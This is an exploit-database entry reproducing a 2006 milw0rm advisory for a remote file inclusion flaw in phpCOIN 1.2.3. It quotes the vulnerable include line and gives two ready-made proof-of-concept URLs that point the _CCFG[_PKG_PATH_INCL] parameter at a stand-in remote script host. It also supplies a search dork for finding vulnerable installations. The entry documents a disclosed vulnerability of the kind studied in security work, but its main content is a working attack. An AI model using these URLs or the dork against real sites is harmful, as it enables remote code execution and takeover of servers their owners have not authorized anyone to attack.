[] NeoSense
E X P L O I T S
title author type platform port cve id

PHPCOIN 1.2.3 - 'session_set.php' Remote File Inclusion

Author: Timq
type: webapps
platform: php
port: 
date_added: 2006-08-23 
date_updated:  
verified: 1 
codes: OSVDB-28225;CVE-2006-4425;OSVDB-28224;CVE-2006-4424;OSVDB-28223;OSVDB-28222;OSVDB-28221;OSVDB-28220;OSVDB-28219;OSVDB-28218 
tags: 
aliases:  
screenshot_url:  
application_url: 
phpCOIN 1.2.3 (_CCFG[_PKG_PATH_INCL]) Remote Include Vulnerability

##################################################################

Discovered by: Timq
http://www.securitydb.org
##################################################################

Email: timq[at]hackernetwork[dot]com

http://www.securitydb.org
##################################################################

Vulnerable: require_once include ($_CCFG['_PKG_PATH_INCL'].'redirect.php');

###################################################################

Exploit PoC:

http://www.site.com/[path]/coin_includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?
http://www.site.com/[path]/includes/constants.php?_CCFG[_PKG_PATH_INCL]=http://evil_script?

Dork: Powered By phpCOIN 1.2.3
####################################################################

Shoutz: Warpboy,Z66,Gammarays,Archangel,BliTz,Splinter,InTel,ErazerZ,Maggot,PunKerX,Infiltration

#####################################################################

# milw0rm.com [2006-08-24]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.